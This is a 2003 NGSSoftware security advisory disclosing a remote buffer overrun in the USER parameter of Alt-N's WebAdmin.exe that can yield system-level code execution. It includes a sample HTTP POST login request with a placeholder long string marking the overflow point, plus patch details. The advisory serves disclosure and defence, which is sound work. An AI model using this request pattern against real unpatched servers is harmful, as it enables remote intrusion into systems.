NGSSoftware Insight Security Research Advisory

Name: Remote System Buffer Overrun WebAdmin.exe
Systems Affected: Windows
Severity: High Risk
Category:               Buffer Overrun
Vendor URL: http://www.altn.com/
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 24th June 2003
Advisory number: #NISR2406-03


Description
***********

WebAdmin allows administrators to securely manage MDaemon, RelayFax, and
WorldClient from anywhere in the world

Details
*******

There is a remotely exploitable buffer overrun in the USER parameter.

By default the webadmin.exe process is started as a system service.  Any
code being passed to the server by an attacker as a result of this buffer
overrun would therefore (based on a default install) execute with system
privileges.

POST /WebAdmin.dll?View=Logon HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Referer: http://ngssoftware.com:1000/
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: MyUser Agent
Host: NGSSoftware.com
Content-Length: 74
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: User=NGSSOFTWARE; Lang=en; Theme=Standard

User=LONGSTRING&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In

Fix Information
***************

NGSSoftware alerted ALTN to theses issues on the 19th of June 2003.
A patch has now been made available from
ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe

A check for these issues has been added to Typhon III, of which more
information is available from the
NGSSoftware website, http://www.ngssoftware.com

Further Information
*******************

For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf